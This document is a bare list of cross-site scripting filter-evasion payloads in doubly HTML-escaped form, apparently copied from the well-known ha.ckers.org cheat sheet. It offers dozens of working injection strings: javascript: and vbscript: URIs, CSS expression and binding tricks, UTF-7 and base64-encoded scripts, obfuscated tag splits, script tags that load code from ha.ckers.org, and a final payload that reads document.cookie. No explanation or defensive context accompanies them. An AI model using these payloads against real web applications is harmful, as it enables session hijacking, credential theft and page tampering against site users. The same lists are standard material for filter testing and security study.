&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
